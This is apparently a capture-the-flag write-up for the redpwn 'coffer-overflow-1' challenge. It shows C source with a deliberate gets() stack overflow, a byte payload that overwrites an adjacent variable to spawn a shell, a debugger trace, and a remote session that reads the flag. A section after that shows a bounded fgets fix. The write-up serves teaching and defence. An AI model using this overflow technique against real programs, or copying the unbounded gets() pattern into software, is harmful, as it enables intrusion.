# (solved) pwn/coffer-overflow-1

```C
#include <stdio.h>
#include <string.h>

int main(void)
{
    long code = 0;
    char name[16];

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);

    puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)");
    puts("What do you want to fill your coffer with?");

    gets(name);

    if(code == 0xcafebabe) {
        system("/bin/sh");
    }
}
```

Exploit:

```bash
python3 -c 'import sys; sys.stdout.buffer.write(b"B"*24 + b"\xbe\xba\xfe\xca")' > input
```

```
pwndbg> disassemble main
Dump of assembler code for function main:
...
   0x00000000004006e2 <+107>:	call   0x400580 <gets@plt>
   0x00000000004006e7 <+112>:	mov    eax,0xcafebabe
   0x00000000004006ec <+117>:	cmp    QWORD PTR [rbp-0x8],rax
   0x00000000004006f0 <+121>:	jne    0x400703 <main+140>
   0x00000000004006f2 <+123>:	lea    rdi,[rip+0x11a]
   0x00000000004006f9 <+130>:	mov    eax,0x0
   0x00000000004006fe <+135>:	call   0x400570 <system@plt>
   0x0000000000400703 <+140>:	mov    eax,0x0
   0x0000000000400708 <+145>:	leave
   0x0000000000400709 <+146>:	ret
pwndbg> break *main+121
pwndbg> run < input
Breakpoint 1, 0x00000000004006f0 in main ()
pwndbg> ni
pwndbg> x/x $rbp-8
0x7fffffffe0e8:	0xcafebabe
pwndbg> i r rip
rip            0x4006f2            0x4006f2 <main+123>
pwndbg> x/x $rbp-8
0x7fffffffe0e8:	0xcafebabe
```

I can get the exploit to work in GDB but not without running it in GDB.

Fuck fuck fuck I had to place a newline at the end. Replace send() with sendline() in my exploit script.

```
# ./doit.py
[+] Opening connection to 2020.redpwnc.tf on port 31255: Done
b'Welcome to coffer overflow, where our coffers are overfilling with bytes ;)\n'
b'What do you want to fill your coffer with?'
[*] Switching to interactive mode
$ ls
Makefile
bin
coffer-overflow-1
coffer-overflow-1.c
dev
flag.txt
lib
lib32
lib64
$ cat flag.txt
flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe}
$
[*] Interrupted
```
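The root cause above is `gets(name)`, which has no length argument and writes past the 16-byte `name` buffer into the adjacent `code` variable at `rbp-0x8`. The fix a reviewer would ask for is a bounded line read. The following is an added example, not code from the challenge or the writeup: a `fgets`-based replacement that stores at most `sizeof name - 1` bytes, strips the newline (the same newline `gets` stops on, which is why `send()` without it hung), and drains the rest of an over-long line so the leftover bytes are not picked up by the next read. The payload it is fed is a constructed copy of the 24-filler-plus-tag input from the writeup; `fmemopen` is used only to turn that string into a stream for offline testing.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the gets() call in the challenge: stores at most
 * dstlen-1 bytes, strips the trailing newline, and drains the remainder of
 * an over-long line so it cannot bleed into the next read. Returns the
 * number of bytes stored in dst. */
size_t read_line_bounded(FILE *in, char *dst, size_t dstlen)
{
    if (dstlen == 0)
        return 0;
    if (fgets(dst, (int)dstlen, in) == NULL) {
        dst[0] = '\0';
        return 0;
    }
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';              /* whole line fit: done */
    } else {
        int c;                        /* line longer than buffer: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return n;
}

/* Convenience wrapper: run the bounded reader over an in-memory line
 * (the input is a constructed test string, not live stdin). */
size_t read_line_bounded_from_string(const char *line, char *dst, size_t dstlen)
{
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL)
        return 0;
    size_t n = read_line_bounded(in, dst, dstlen);
    fclose(in);
    return n;
}

/* Two consecutive reads from one stream: the 28-byte payload (24 filler
 * bytes plus the 4-byte tag, constructed after the writeup's input) is
 * truncated to 15 bytes and its tail drained, so the second read sees the
 * next line rather than leftovers. Returns 1 when both reads behave. */
int demo_overlong_then_short(void)
{
    static const char stream[] =
        "BBBBBBBBBBBBBBBBBBBBBBBB\xbe\xba\xfe\xca\n"   /* constructed overflow input */
        "alice\n";                                      /* a well-behaved second line */
    FILE *in = fmemopen((void *)stream, sizeof stream - 1, "r");
    if (in == NULL)
        return 0;
    char name[16];
    size_t n1 = read_line_bounded(in, name, sizeof name);
    int first_ok = (n1 == 15 && strcmp(name, "BBBBBBBBBBBBBBB") == 0);
    size_t n2 = read_line_bounded(in, name, sizeof name);
    int second_ok = (n2 == 5 && strcmp(name, "alice") == 0);
    fclose(in);
    return first_ok && second_ok;
}

int main(void)
{
    printf("bounded read demo: %s\n", demo_overlong_then_short() ? "ok" : "FAIL");
    return 0;
}
```

With this in place of `gets`, the 24-byte filler never reaches `code` because `fgets` stops writing at 15 bytes regardless of how long the line is; the drain loop matters too, since without it the unread tail would be consumed by whatever read comes next.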